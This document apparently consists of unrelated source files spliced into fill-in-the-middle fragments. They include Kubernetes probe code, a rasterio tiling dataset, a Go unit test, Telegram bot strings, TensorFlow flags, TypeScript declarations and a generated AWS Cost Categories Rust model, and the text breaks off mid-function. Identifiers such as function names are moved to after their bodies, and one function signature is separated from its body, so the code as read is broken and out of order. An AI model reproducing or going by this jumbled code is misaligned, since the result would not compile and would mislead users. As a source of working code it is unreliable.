// buildHeader takes a list of HTTPHeader <name, value> string
// pairs and returns a populated string->[]string http.Header map.
// Keys are inserted verbatim (no MIME canonicalization), so the probe sends
// exactly the header names the user specified.
func buildHeader(headerList []v1.HTTPHeader) http.Header {
	headers := http.Header{}
	for i := range headerList {
		name, value := headerList[i].Name, headerList[i].Value
		headers[name] = append(headers[name], value)
	}
	return headers
}
// runProbe executes one attempt of the configured handler (Exec, HTTPGet, or
// TCPSocket) for the given probe spec and returns the raw probe result,
// any output, and an error if the probe could not run.
func (pb *prober) runProbe(probeType probeType, p *v1.Probe, pod *v1.Pod, status v1.PodStatus, container v1.Container, containerID kubecontainer.ContainerID) (probe.Result, string, error) {
	timeout := time.Duration(p.TimeoutSeconds) * time.Second
	if p.Exec != nil {
		klog.V(4).InfoS("Exec-Probe runProbe", "pod", klog.KObj(pod), "containerName", container.Name, "execCommand", p.Exec.Command)
		// Expand only static env var references in the command.
		command := kubecontainer.ExpandContainerCommandOnlyStatic(p.Exec.Command, container.Env)
		return pb.exec.Probe(pb.newExecInContainer(container, containerID, command, timeout))
	}
	if p.HTTPGet != nil {
		scheme := strings.ToLower(string(p.HTTPGet.Scheme))
		host := p.HTTPGet.Host
		// Default to the pod's own IP when no host is specified.
		if host == "" {
			host = status.PodIP
		}
		port, err := extractPort(p.HTTPGet.Port, container)
		if err != nil {
			return probe.Unknown, "", err
		}
		path := p.HTTPGet.Path
		klog.V(4).InfoS("HTTP-Probe Host", "scheme", scheme, "host", host, "port", port, "path", path)
		url := formatURL(scheme, host, port, path)
		headers := buildHeader(p.HTTPGet.HTTPHeaders)
		klog.V(4).InfoS("HTTP-Probe Headers", "headers", headers)
		// Each probe type uses its own HTTP prober (separate connection pools).
		switch probeType {
		case liveness:
			return pb.livenessHTTP.Probe(url, headers, timeout)
		case startup:
			return pb.startupHTTP.Probe(url, headers, timeout)
		default:
			return pb.readinessHTTP.Probe(url, headers, timeout)
		}
	}
	if p.TCPSocket != nil {
		port, err := extractPort(p.TCPSocket.Port, container)
		if err != nil {
			return probe.Unknown, "", err
		}
		host := p.TCPSocket.Host
		if host == "" {
			host = status.PodIP
		}
		klog.V(4).InfoS("TCP-Probe Host", "host", host, "port", port, "timeout", timeout)
		return pb.tcp.Probe(host, port, timeout)
	}
	// No handler configured at all: report Unknown with an explanatory error.
	klog.InfoS("Failed to find probe builder for container", "containerName", container.Name)
	return probe.Unknown, "", fmt.Errorf("missing probe handler for %s:%s", format.Pod(pod), container.Name)
}
func extractPort(param intstr.IntOrString, container v1.Container) (int, error) |
// findPortByName is a helper function to look up a port in a container by name.
func findPortByName(container v1.Container, portName string) (int, error) {
for _, port := range container.Ports {
if port.Name == portName {
return int(port.ContainerPort), nil
}
}
return 0, fmt.Errorf("port %s not found", portName)
}
// formatURL formats a URL from args. For testability.
func formatURL(scheme string, host string, port int, path string) *url.URL {
u, err := url.Parse(path)
// Something is busted with the path, but it's too late to reject it. Pass it along as is.
if err != nil {
u = &url.URL{
Path: path,
}
}
u.Scheme = scheme
u.Host = net.JoinHostPort(host, strconv.Itoa(port))
return u
}
type execInContainer struct {
// run executes a command in a container. Combined stdout and stderr output is always returned. An
// error is returned if one occurred.
run func() ([]byte, error)
writer io.Writer
}
func (pb *prober) newExecInContainer(container v1.Container, containerID kubecontainer.ContainerID, cmd []string, timeout time.Duration) exec.Cmd {
return &execInContainer{run: func() ([]byte, error) {
return pb.runner.RunInContainer(containerID, cmd, timeout)
}}
}
func (eic *execInContainer) Run() error {
return nil
}
func (eic *execInContainer) CombinedOutput() ([]byte, error) {
return eic.run()
}
func (eic *execInContainer) Output() ([]byte, error) {
return nil, fmt.Errorf("unimplemented")
}
func (eic *execInContainer) SetDir(dir string) {
//unimplemented
}
func (eic *execInContainer) SetStdin(in io.Reader) {
//unimplemented
}
func (eic *execInContainer) SetStdout(out io.Writer) {
eic.writer = out
}
func (eic *execInContainer) SetStderr(out io.Writer) {
eic.writer = out
}
func (eic *execInContainer) SetEnv(env []string) {
//unimplemented
}
func (eic *execInContainer) Stop() {
//unimplemented
}
func (eic *execInContainer) Start() error {
data, err := eic.run()
if eic.writer != nil {
eic.writer.Write(data)
}
return err
}
func (eic *execInContainer) Wait() error {
return nil
}
func (eic *execInContainer) StdoutPipe() (io.ReadCloser, error) {
return nil, fmt.Errorf("unimplemented")
}
func (eic *execInContainer) StderrPipe() (io.ReadCloser, error) {
return nil, fmt.Errorf("unimplemented")
}
| {
port := -1
var err error
switch param.Type {
case intstr.Int:
port = param.IntValue()
case intstr.String:
if port, err = findPortByName(container, param.StrVal); err != nil {
// Last ditch effort - maybe it was an int stored as string?
if port, err = strconv.Atoi(param.StrVal); err != nil {
return port, err
}
}
default:
return port, fmt.Errorf("intOrString had no kind: %+v", param)
}
if port > 0 && port < 65536 {
return port, nil
}
return port, fmt.Errorf("invalid port number: %v", port)
} |
raster.py | import os
import rasterio
import numpy as np
from ..utils import pair, bytescale
from .base import BaseRasterData
class RasterSampleDataset(BaseRasterData):
"""Dataset wrapper for remote sensing data.
Args:
fname:
win_size:
step_size:
pad_size:
band_index:
"""
def __init__(self,
fname,
win_size=512,
step_size=512,
pad_size=0,
band_index=None,
to_type=None,
data_format='channel_last',
transform=None):
super().__init__(fname=fname)
assert data_format in (
'channel_first',
'channel_last'), "data format must be 'channel_first' or "
f"'channel_last', but got type {data_format}"
self.data_format = data_format
self.win_size = pair(win_size)
self.step_size = pair(step_size)
self.pad_size = pair(pad_size)
total_band_index = [i + 1 for i in range(self.count)]
if band_index is None:
self.band_index = total_band_index
else:
assert set(band_index).issubset(set(total_band_index))
self.band_index = band_index
self.to_type = to_type
self.window_ids = self.get_windows_info()
self.transform = transform
self.start = 0
self.end = len(self)
def get_windows_info(self):
left, top = 0, 0
width, height = self.width, self.height
left_top_xy = [] # left-top corner coordinates (xmin, ymin)
while left < width:
if left + self.win_size[0] >= width:
left = max(width - self.win_size[0], 0)
top = 0
while top < height:
if top + self.win_size[1] >= height:
top = max(height - self.win_size[1], 0)
# right = min(left + self.win_size[0], width - 1)
# bottom = min(top + self.win_size[1], height - 1)
# save
left_top_xy.append((left, top))
if top + self.win_size[1] >= height:
break
else:
top += self.step_size[1]
if left + self.win_size[0] >= width:
break
else:
left += self.step_size[0]
return left_top_xy
def sample(self, x, y):
"""Get the values of dataset at certain positions.
"""
xmin, ymin = x, y
xsize, ysize = self.win_size
xpad, ypad = self.pad_size
xmin -= xpad
ymin -= ypad
left, top = 0, 0
if xmin < 0:
xmin = 0
xsize += xpad
left = xpad
elif xmin + xsize + 2 * xpad > self.width:
xsize += xpad
else:
xsize += 2 * xpad
if ymin < 0:
ymin = 0
ysize += ypad
top = ypad
elif ymin + ysize + 2 * ypad > self.height:
ysize += ypad
else:
ysize += 2 * ypad
# col_off, row_off, width, height
window = rasterio.windows.Window(xmin, ymin, xsize, ysize)
# with rasterio.open(self.image_file) as src:
# bands = [src.read(k, window=tile_window) for k in self.band_index]
# tile_image = np.stack(bands, axis=-1)
bands = [self._band.read(k, window=window) for k in self.band_index]
if self.to_type and np.dtype(self.to_type) != np.dtype(self.dtype):
bmin, bmax = self.minmax
msks = [
self._band.read_masks(k, window=window)
for k in self.band_index
]
bands = [
bytescale(b, msk, bmin[i], bmax[i], dtype=self.to_type)
for i, (b, msk) in enumerate(zip(bands, msks))
]
tile_image = np.stack(bands, axis=-1)
img = np.zeros(
(self.win_size[0] + 2 * xpad, self.win_size[0] + 2 * ypad,
len(self.band_index)),
dtype=tile_image.dtype)
img[top:top + ysize, left:left + xsize] = tile_image
if self.data_format == 'channel_first':
img = img.transpose(2, 0, 1)
return img
def __getitem__(self, idx):
x, y = self.window_ids[idx]
img = self.sample(x, y)
if self.transform is not None:
img = self.transform(img)
return img, x, y
def | (self):
return len(self.window_ids)
@property
def step(self):
return self.step_size
@property
def pad(self):
return self.pad_size
| __len__ |
main_test.go | package main
import "testing"
type args struct {
s string
t string
}
var tests = []struct {
name string
args args
want bool
}{
{"test ok", args{"egg", "add"}, true},
{"test fail", args{"foo", "tar"}, false},
{"test ok", args{"paper", "title"}, true},
{"test ok", args{"ab", "aa"}, false},
{"test ok", args{"bar", "foo"}, false},
}
func | (t *testing.T) {
for _, tt := range tests {
t.Run(tt.name, func(t *testing.T) {
if got := isIsomorphic(tt.args.s, tt.args.t); got != tt.want {
t.Errorf("isIsomorphic() = %v, want %v", got, tt.want)
}
})
}
}
| Test_isIsomorphic |
translation.py | class Translation(object):
START_TEXT = """<b>Hai {}!!!</b>
<code>Im Simple Telegraph Uploader Bot😜</code>
<b>» You Must Join My Updates Channel for using me</b>
<i>Click Help Button For More Details</i>"""
HELP_TEXT = """<b>Hey {}!!!,Please Folow these Steps</b>
➥ <code>Send any Image, Gif or Video(Mp4 Only) below 5MB.</code> | /help - <b>How To Use Me</b>
/about - <b>More About Me</b>"""
ABOUT_TEXT = """**➥ My Name** : ```Telegraph Bot```
**➥ Creator** : <a href=https://t.me/D_ar_k_Angel>Dark Angel</a>
**➥ Credits** : ```Everyone in this journey```
**➥ Language** : ```Python3```
**➥ Library** : <a href=https://docs.pyrogram.org>Pyrogram asyncio 0.18.0</a>
**➥ Server** : ```Heroku```
**➥ Build Status** : ```V01.1 [BETA]```""" | ➥ <code>Bot will send you the Telegra.ph link.</code>
<b>Available Commands</b>
/start - <b>Checking Bot Online</b> |
import.rs | use crate::model::complex_types::t_import;
// wsdl:import
// Element information
// Namespace: http://schemas.xmlsoap.org/wsdl/
// Schema document: wsdl11.xsd
// Type: wsdl:tImport
// Properties: Local, Qualified
//
// Content
// wsdl:documentation [0..1] from type wsdl:tDocumented
// | // Used in
// Group wsdl:anyTopLevelOptionalElement
// Type wsdl:tDefinitions via reference to wsdl:anyTopLevelOptionalElement (Element wsdl:definitions)
// Sample instance
// <wsdl:import namespace="http://example.com/stockquote/schemas"
// location="http://example.com/stockquote/stockquote.xsd"/>
pub type Import<'a> = t_import::Import<'a>; | // Attributes
// Any attribute [0..*] Namespace: ##other, Process Contents: lax from type wsdl:tExtensibleAttributesDocumented
// namespace [1..1] xsd:anyURI
// location [1..1] xsd:anyURI |
flags.py |
import tensorflow as tf
FLAGS = tf.app.flags.FLAGS
def | ():
############
# Run mode
############
tf.app.flags.DEFINE_string('run', None, "Which operation to run. [train|inference]")
##########################
# Training parameters
###########################
tf.app.flags.DEFINE_integer('nb_epoch', 400, "Number of epochs")
tf.app.flags.DEFINE_integer('batch_size', 64, "Number of samples per batch.")
tf.app.flags.DEFINE_integer('nb_batch_per_epoch', 500, "Number of batches per epoch")
tf.app.flags.DEFINE_float('learning_rate', 2E-4, "Learning rate used for AdamOptimizer")
tf.app.flags.DEFINE_integer('noise_dim', 100, "Noise dimension for GAN generation")
tf.app.flags.DEFINE_integer('random_seed', 0, "Seed used to initialize rng.")
############################################
# General tensorflow parameters parameters
#############################################
tf.app.flags.DEFINE_bool('use_XLA', False, "Whether to use XLA compiler.")
tf.app.flags.DEFINE_integer('num_threads', 2, "Number of threads to fetch the data")
tf.app.flags.DEFINE_float('capacity_factor', 32, "Nuumber of batches to store in queue")
##########
# Datasets
##########
tf.app.flags.DEFINE_string('data_format', "NCHW", "Tensorflow image data format.")
tf.app.flags.DEFINE_string('celebA_path', "../../data/raw/img_align_celeba", "Path to celebA images")
tf.app.flags.DEFINE_integer('channels', 3, "Number of channels")
tf.app.flags.DEFINE_float('central_fraction', 0.8, "Central crop as a fraction of total image")
tf.app.flags.DEFINE_integer('img_size', 64, "Image size")
##############
# Directories
##############
tf.app.flags.DEFINE_string('model_dir', '../../models', "Output folder where checkpoints are dumped.")
tf.app.flags.DEFINE_string('log_dir', '../../logs', "Logs for tensorboard.")
tf.app.flags.DEFINE_string('fig_dir', '../../figures', "Where to save figures.")
tf.app.flags.DEFINE_string('raw_dir', '../../data/raw', "Where raw data is saved")
tf.app.flags.DEFINE_string('data_dir', '../../data/processed', "Where processed data is saved")
| define_flags |
index.d.ts | export type Unwatch = () => void
export declare class Path<T> {
set(value: T): void
get(): T
watch(fn: (state: T) => void): Unwatch
unwatch: Unwatch
batch(fn: (path: Path<T>) => void): void
getPath(): string
getPathFull(): string[]
path<K extends keyof T>(key: K): Path<T[K]>
} | export declare function path<T>(name: string, defaultState: T): Path<T> |
|
consumption_management_client_enums.py | # coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for
# license information.
#
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is
# regenerated.
# --------------------------------------------------------------------------
from enum import Enum
class | (Enum):
daily_grain = "daily"
monthly_grain = "monthly"
| Datagrain |
model.rs | // Code generated by software.amazon.smithy.rust.codegen.smithy-rs. DO NOT EDIT.
/// <p>Use the split charge rule to split the cost of one Cost Category value across several
/// other target values. </p>
#[non_exhaustive]
#[derive(std::clone::Clone, std::cmp::PartialEq)]
pub struct CostCategorySplitChargeRule {
/// <p>The Cost Category value that you want to split. That value can't be used as a source
/// or a target in other split charge rules. To indicate uncategorized costs, you can use an empty string as the source.</p>
pub source: std::option::Option<std::string::String>,
/// <p>The Cost Category values that you want to split costs across. These values can't be
/// used as a source in other split charge rules. </p>
pub targets: std::option::Option<std::vec::Vec<std::string::String>>,
/// <p>The method that's used to define how to split your source costs across your targets. </p>
/// <p>
/// <code>Proportional</code> - Allocates charges across your targets based on the
/// proportional weighted cost of each target.</p>
/// <p>
/// <code>Fixed</code> - Allocates charges across your targets based on your defined
/// allocation percentage.</p>
/// <p>><code>Even</code> - Allocates costs evenly across all targets.</p>
pub method: std::option::Option<crate::model::CostCategorySplitChargeMethod>,
/// <p>The parameters for a split charge method. This is only required for the
/// <code>FIXED</code> method. </p>
pub parameters:
std::option::Option<std::vec::Vec<crate::model::CostCategorySplitChargeRuleParameter>>,
}
impl std::fmt::Debug for CostCategorySplitChargeRule {
fn fmt(&self, f: &mut std::fmt::Formatter<'_>) -> std::fmt::Result {
let mut formatter = f.debug_struct("CostCategorySplitChargeRule");
formatter.field("source", &self.source);
formatter.field("targets", &self.targets);
formatter.field("method", &self.method);
formatter.field("parameters", &self.parameters);
formatter.finish()
}
}
/// See [`CostCategorySplitChargeRule`](crate::model::CostCategorySplitChargeRule)
pub mod cost_category_split_charge_rule {
/// A builder for [`CostCategorySplitChargeRule`](crate::model::CostCategorySplitChargeRule)
#[non_exhaustive]
#[derive(std::default::Default, std::clone::Clone, std::cmp::PartialEq, std::fmt::Debug)]
pub struct Builder {
pub(crate) source: std::option::Option<std::string::String>,
pub(crate) targets: std::option::Option<std::vec::Vec<std::string::String>>,
pub(crate) method: std::option::Option<crate::model::CostCategorySplitChargeMethod>,
pub(crate) parameters:
std::option::Option<std::vec::Vec<crate::model::CostCategorySplitChargeRuleParameter>>,
}
impl Builder {
/// <p>The Cost Category value that you want to split. That value can't be used as a source
/// or a target in other split charge rules. To indicate uncategorized costs, you can use an empty string as the source.</p>
pub fn source(mut self, input: impl Into<std::string::String>) -> Self {
self.source = Some(input.into());
self
}
pub fn set_source(mut self, input: std::option::Option<std::string::String>) -> Self {
self.source = input;
self
}
pub fn targets(mut self, input: impl Into<std::string::String>) -> Self {
let mut v = self.targets.unwrap_or_default();
v.push(input.into());
self.targets = Some(v);
self
}
pub fn set_targets(
mut self,
input: std::option::Option<std::vec::Vec<std::string::String>>,
) -> Self {
self.targets = input;
self
}
/// <p>The method that's used to define how to split your source costs across your targets. </p>
/// <p>
/// <code>Proportional</code> - Allocates charges across your targets based on the
/// proportional weighted cost of each target.</p>
/// <p>
/// <code>Fixed</code> - Allocates charges across your targets based on your defined
/// allocation percentage.</p>
/// <p>><code>Even</code> - Allocates costs evenly across all targets.</p>
pub fn method(mut self, input: crate::model::CostCategorySplitChargeMethod) -> Self {
self.method = Some(input);
self
}
pub fn set_method(
mut self,
input: std::option::Option<crate::model::CostCategorySplitChargeMethod>,
) -> Self {
self.method = input;
self
}
pub fn parameters(
mut self,
input: impl Into<crate::model::CostCategorySplitChargeRuleParameter>,
) -> Self {
let mut v = self.parameters.unwrap_or_default();
v.push(input.into());
self.parameters = Some(v);
self
}
pub fn set_parameters(
mut self,
input: std::option::Option<
std::vec::Vec<crate::model::CostCategorySplitChargeRuleParameter>,
>,
) -> Self {
self.parameters = input;
self
}
/// Consumes the builder and constructs a [`CostCategorySplitChargeRule`](crate::model::CostCategorySplitChargeRule)
pub fn build(self) -> crate::model::CostCategorySplitChargeRule {
crate::model::CostCategorySplitChargeRule {
source: self.source,
targets: self.targets,
method: self.method,
parameters: self.parameters,
}
}
}
}
impl CostCategorySplitChargeRule {
/// Creates a new builder-style object to manufacture [`CostCategorySplitChargeRule`](crate::model::CostCategorySplitChargeRule)
pub fn builder() -> crate::model::cost_category_split_charge_rule::Builder {
crate::model::cost_category_split_charge_rule::Builder::default()
}
}
/// <p>The parameters for a split charge method. </p>
#[non_exhaustive]
#[derive(std::clone::Clone, std::cmp::PartialEq)]
pub struct CostCategorySplitChargeRuleParameter {
/// <p>The parameter type. </p>
pub r#type: std::option::Option<crate::model::CostCategorySplitChargeRuleParameterType>,
/// <p>The parameter values. </p>
pub values: std::option::Option<std::vec::Vec<std::string::String>>,
}
impl std::fmt::Debug for CostCategorySplitChargeRuleParameter {
fn fmt(&self, f: &mut std::fmt::Formatter<'_>) -> std::fmt::Result {
let mut formatter = f.debug_struct("CostCategorySplitChargeRuleParameter");
formatter.field("r#type", &self.r#type);
formatter.field("values", &self.values);
formatter.finish()
}
}
/// See [`CostCategorySplitChargeRuleParameter`](crate::model::CostCategorySplitChargeRuleParameter)
pub mod cost_category_split_charge_rule_parameter {
/// A builder for [`CostCategorySplitChargeRuleParameter`](crate::model::CostCategorySplitChargeRuleParameter)
#[non_exhaustive]
#[derive(std::default::Default, std::clone::Clone, std::cmp::PartialEq, std::fmt::Debug)]
pub struct Builder {
pub(crate) r#type:
std::option::Option<crate::model::CostCategorySplitChargeRuleParameterType>,
pub(crate) values: std::option::Option<std::vec::Vec<std::string::String>>,
}
impl Builder {
/// <p>The parameter type. </p>
pub fn r#type(
mut self,
input: crate::model::CostCategorySplitChargeRuleParameterType,
) -> Self {
self.r#type = Some(input);
self
}
pub fn set_type(
mut self,
input: std::option::Option<crate::model::CostCategorySplitChargeRuleParameterType>,
) -> Self {
self.r#type = input;
self
}
pub fn values(mut self, input: impl Into<std::string::String>) -> Self {
let mut v = self.values.unwrap_or_default();
v.push(input.into());
self.values = Some(v);
self
}
pub fn set_values(
mut self,
input: std::option::Option<std::vec::Vec<std::string::String>>,
) -> Self {
self.values = input;
self
}
/// Consumes the builder and constructs a [`CostCategorySplitChargeRuleParameter`](crate::model::CostCategorySplitChargeRuleParameter)
pub fn build(self) -> crate::model::CostCategorySplitChargeRuleParameter {
crate::model::CostCategorySplitChargeRuleParameter {
r#type: self.r#type,
values: self.values,
}
}
}
}
impl CostCategorySplitChargeRuleParameter {
/// Creates a new builder-style object to manufacture [`CostCategorySplitChargeRuleParameter`](crate::model::CostCategorySplitChargeRuleParameter)
pub fn builder() -> crate::model::cost_category_split_charge_rule_parameter::Builder {
crate::model::cost_category_split_charge_rule_parameter::Builder::default()
}
}
#[non_exhaustive]
#[derive(
std::clone::Clone,
std::cmp::Eq,
std::cmp::Ord,
std::cmp::PartialEq,
std::cmp::PartialOrd,
std::fmt::Debug,
std::hash::Hash,
)]
pub enum CostCategorySplitChargeRuleParameterType {
AllocationPercentages,
/// Unknown contains new variants that have been added since this code was generated.
Unknown(String),
}
impl std::convert::From<&str> for CostCategorySplitChargeRuleParameterType {
fn from(s: &str) -> Self {
match s {
"ALLOCATION_PERCENTAGES" => {
CostCategorySplitChargeRuleParameterType::AllocationPercentages
}
other => CostCategorySplitChargeRuleParameterType::Unknown(other.to_owned()),
}
}
}
impl std::str::FromStr for CostCategorySplitChargeRuleParameterType {
type Err = std::convert::Infallible;
fn from_str(s: &str) -> std::result::Result<Self, Self::Err> {
Ok(CostCategorySplitChargeRuleParameterType::from(s))
}
}
impl CostCategorySplitChargeRuleParameterType {
pub fn as_str(&self) -> &str {
match self {
CostCategorySplitChargeRuleParameterType::AllocationPercentages => {
"ALLOCATION_PERCENTAGES"
}
CostCategorySplitChargeRuleParameterType::Unknown(s) => s.as_ref(),
}
}
pub fn values() -> &'static [&'static str] {
&["ALLOCATION_PERCENTAGES"]
}
}
impl AsRef<str> for CostCategorySplitChargeRuleParameterType {
fn as_ref(&self) -> &str {
self.as_str()
}
}
#[non_exhaustive]
#[derive(
std::clone::Clone,
std::cmp::Eq,
std::cmp::Ord,
std::cmp::PartialEq,
std::cmp::PartialOrd,
std::fmt::Debug,
std::hash::Hash,
)]
pub enum CostCategorySplitChargeMethod {
Even,
Fixed,
Proportional,
/// Unknown contains new variants that have been added since this code was generated.
Unknown(String),
}
impl std::convert::From<&str> for CostCategorySplitChargeMethod {
fn from(s: &str) -> Self {
match s {
"EVEN" => CostCategorySplitChargeMethod::Even,
"FIXED" => CostCategorySplitChargeMethod::Fixed,
"PROPORTIONAL" => CostCategorySplitChargeMethod::Proportional,
other => CostCategorySplitChargeMethod::Unknown(other.to_owned()),
}
}
}
impl std::str::FromStr for CostCategorySplitChargeMethod {
type Err = std::convert::Infallible;
fn from_str(s: &str) -> std::result::Result<Self, Self::Err> {
Ok(CostCategorySplitChargeMethod::from(s))
}
}
impl CostCategorySplitChargeMethod {
pub fn as_str(&self) -> &str {
match self {
CostCategorySplitChargeMethod::Even => "EVEN",
CostCategorySplitChargeMethod::Fixed => "FIXED",
CostCategorySplitChargeMethod::Proportional => "PROPORTIONAL",
CostCategorySplitChargeMethod::Unknown(s) => s.as_ref(),
}
}
pub fn values() -> &'static [&'static str] {
&["EVEN", "FIXED", "PROPORTIONAL"]
}
}
impl AsRef<str> for CostCategorySplitChargeMethod {
fn as_ref(&self) -> &str {
self.as_str()
}
}
/// <p>Rules are processed in order. If there are multiple rules that match the line item,
/// then the first rule to match is used to determine that Cost Category value.</p>
#[non_exhaustive]
#[derive(std::clone::Clone, std::cmp::PartialEq)]
pub struct CostCategoryRule {
/// <p>The
/// default value for the cost category.</p>
pub value: std::option::Option<std::string::String>,
/// <p>An <a href="https://docs.aws.amazon.com/aws-cost-management/latest/APIReference/API_Expression.html">Expression</a>
/// object used to categorize costs. This supports dimensions, tags, and nested expressions.
/// Currently the only dimensions supported are <code>LINKED_ACCOUNT</code>,
/// <code>SERVICE_CODE</code>, <code>RECORD_TYPE</code>, and
/// <code>LINKED_ACCOUNT_NAME</code>.</p>
/// <p>Root level <code>OR</code> isn't supported. We recommend that you create a separate
/// rule instead.</p>
/// <p>
/// <code>RECORD_TYPE</code> is a dimension used for Cost Explorer APIs, and is also
/// supported for Cost Category expressions. This dimension uses different terms, depending
/// on whether you're using the console or API/JSON editor. For a detailed comparison, see
/// <a href="https://docs.aws.amazon.com/awsaccountbilling/latest/aboutv2/manage-cost-categories.html#cost-categories-terms">Term Comparisons</a> in the <i>Billing and Cost Management User
/// Guide</i>.</p>
pub rule: std::option::Option<crate::model::Expression>,
/// <p>The value the line item is categorized as if the line item contains the matched
/// dimension.</p>
pub inherited_value: std::option::Option<crate::model::CostCategoryInheritedValueDimension>,
/// <p>You can define the <code>CostCategoryRule</code> rule type as either
/// <code>REGULAR</code> or <code>INHERITED_VALUE</code>. The
/// <code>INHERITED_VALUE</code> rule type adds the flexibility of defining a rule that
/// dynamically inherits the cost category value from the dimension value defined by
/// <code>CostCategoryInheritedValueDimension</code>. For example, if you want to
/// dynamically group costs based on the value of a specific tag key, first choose an
/// inherited value rule type, then choose the tag dimension and specify the tag key to
/// use.</p>
pub r#type: std::option::Option<crate::model::CostCategoryRuleType>,
}
impl std::fmt::Debug for CostCategoryRule {
fn fmt(&self, f: &mut std::fmt::Formatter<'_>) -> std::fmt::Result {
let mut formatter = f.debug_struct("CostCategoryRule");
formatter.field("value", &self.value);
formatter.field("rule", &self.rule);
formatter.field("inherited_value", &self.inherited_value);
formatter.field("r#type", &self.r#type);
formatter.finish()
}
}
/// See [`CostCategoryRule`](crate::model::CostCategoryRule)
pub mod cost_category_rule {
/// A builder for [`CostCategoryRule`](crate::model::CostCategoryRule)
#[non_exhaustive]
#[derive(std::default::Default, std::clone::Clone, std::cmp::PartialEq, std::fmt::Debug)]
pub struct Builder {
pub(crate) value: std::option::Option<std::string::String>,
pub(crate) rule: std::option::Option<crate::model::Expression>,
pub(crate) inherited_value:
std::option::Option<crate::model::CostCategoryInheritedValueDimension>,
pub(crate) r#type: std::option::Option<crate::model::CostCategoryRuleType>,
}
impl Builder {
/// <p>The
/// default value for the cost category.</p>
pub fn value(mut self, input: impl Into<std::string::String>) -> Self {
self.value = Some(input.into());
self
}
pub fn set_value(mut self, input: std::option::Option<std::string::String>) -> Self {
self.value = input;
self
}
/// <p>An <a href="https://docs.aws.amazon.com/aws-cost-management/latest/APIReference/API_Expression.html">Expression</a>
/// object used to categorize costs. This supports dimensions, tags, and nested expressions.
/// Currently the only dimensions supported are <code>LINKED_ACCOUNT</code>,
/// <code>SERVICE_CODE</code>, <code>RECORD_TYPE</code>, and
/// <code>LINKED_ACCOUNT_NAME</code>.</p>
/// <p>Root level <code>OR</code> isn't supported. We recommend that you create a separate
/// rule instead.</p>
/// <p>
/// <code>RECORD_TYPE</code> is a dimension used for Cost Explorer APIs, and is also
/// supported for Cost Category expressions. This dimension uses different terms, depending
/// on whether you're using the console or API/JSON editor. For a detailed comparison, see
/// <a href="https://docs.aws.amazon.com/awsaccountbilling/latest/aboutv2/manage-cost-categories.html#cost-categories-terms">Term Comparisons</a> in the <i>Billing and Cost Management User
/// Guide</i>.</p>
pub fn rule(mut self, input: crate::model::Expression) -> Self {
self.rule = Some(input);
self
}
pub fn set_rule(mut self, input: std::option::Option<crate::model::Expression>) -> Self {
self.rule = input;
self
}
/// <p>The value the line item is categorized as if the line item contains the matched
/// dimension.</p>
pub fn inherited_value(
mut self,
input: crate::model::CostCategoryInheritedValueDimension,
) -> Self {
self.inherited_value = Some(input);
self
}
pub fn set_inherited_value(
mut self,
input: std::option::Option<crate::model::CostCategoryInheritedValueDimension>,
) -> Self {
self.inherited_value = input;
self
}
/// <p>You can define the <code>CostCategoryRule</code> rule type as either
/// <code>REGULAR</code> or <code>INHERITED_VALUE</code>. The
/// <code>INHERITED_VALUE</code> rule type adds the flexibility of defining a rule that
/// dynamically inherits the cost category value from the dimension value defined by
/// <code>CostCategoryInheritedValueDimension</code>. For example, if you want to
/// dynamically group costs based on the value of a specific tag key, first choose an
/// inherited value rule type, then choose the tag dimension and specify the tag key to
/// use.</p>
pub fn r#type(mut self, input: crate::model::CostCategoryRuleType) -> Self {
self.r#type = Some(input);
self
}
pub fn set_type(
mut self,
input: std::option::Option<crate::model::CostCategoryRuleType>,
) -> Self {
self.r#type = input;
self
}
/// Consumes the builder and constructs a [`CostCategoryRule`](crate::model::CostCategoryRule)
pub fn build(self) -> crate::model::CostCategoryRule {
crate::model::CostCategoryRule {
value: self.value,
rule: self.rule,
inherited_value: self.inherited_value,
r#type: self.r#type,
}
}
}
}
impl CostCategoryRule {
/// Creates a new builder-style object to manufacture [`CostCategoryRule`](crate::model::CostCategoryRule)
pub fn builder() -> crate::model::cost_category_rule::Builder {
crate::model::cost_category_rule::Builder::default()
}
}
#[non_exhaustive]
#[derive(
std::clone::Clone,
std::cmp::Eq,
std::cmp::Ord,
std::cmp::PartialEq,
std::cmp::PartialOrd,
std::fmt::Debug,
std::hash::Hash,
)]
pub enum CostCategoryRuleType {
InheritedValue,
Regular,
/// Unknown contains new variants that have been added since this code was generated.
Unknown(String),
}
impl std::convert::From<&str> for CostCategoryRuleType {
fn from(s: &str) -> Self {
match s {
"INHERITED_VALUE" => CostCategoryRuleType::InheritedValue,
"REGULAR" => CostCategoryRuleType::Regular,
other => CostCategoryRuleType::Unknown(other.to_owned()),
}
}
}
impl std::str::FromStr for CostCategoryRuleType {
type Err = std::convert::Infallible;
fn from_str(s: &str) -> std::result::Result<Self, Self::Err> {
Ok(CostCategoryRuleType::from(s))
}
}
impl CostCategoryRuleType {
pub fn as_str(&self) -> &str {
match self {
CostCategoryRuleType::InheritedValue => "INHERITED_VALUE",
CostCategoryRuleType::Regular => "REGULAR",
CostCategoryRuleType::Unknown(s) => s.as_ref(),
}
}
pub fn values() -> &'static [&'static str] {
&["INHERITED_VALUE", "REGULAR"]
}
}
impl AsRef<str> for CostCategoryRuleType {
fn as_ref(&self) -> &str {
self.as_str()
}
}
/// <p>When creating or updating a cost category, you can define the
/// <code>CostCategoryRule</code> rule type as <code>INHERITED_VALUE</code>. This rule
/// type adds the flexibility of defining a rule that dynamically inherits the cost category
/// value from the dimension value defined by
/// <code>CostCategoryInheritedValueDimension</code>. For example, if you want to
/// dynamically group costs that are based on the value of a specific tag key, first choose
/// an inherited value rule type, then choose the tag dimension and specify the tag key to
/// use.</p>
#[non_exhaustive]
#[derive(std::clone::Clone, std::cmp::PartialEq)]
pub struct CostCategoryInheritedValueDimension {
    /// <p>The name of the dimension that's used to group costs.</p>
    /// <p>If you specify <code>LINKED_ACCOUNT_NAME</code>, the cost category value is based on
    /// account name. If you specify <code>TAG</code>, the cost category value will be based on
    /// the value of the specified tag key.</p>
    pub dimension_name: std::option::Option<crate::model::CostCategoryInheritedValueDimensionName>,
    /// <p>The key to extract cost category values.</p>
    pub dimension_key: std::option::Option<std::string::String>,
}
impl std::fmt::Debug for CostCategoryInheritedValueDimension {
    fn fmt(&self, f: &mut std::fmt::Formatter<'_>) -> std::fmt::Result {
        // Chained debug-struct builder; renders exactly the same output as
        // the statement-per-field form.
        f.debug_struct("CostCategoryInheritedValueDimension")
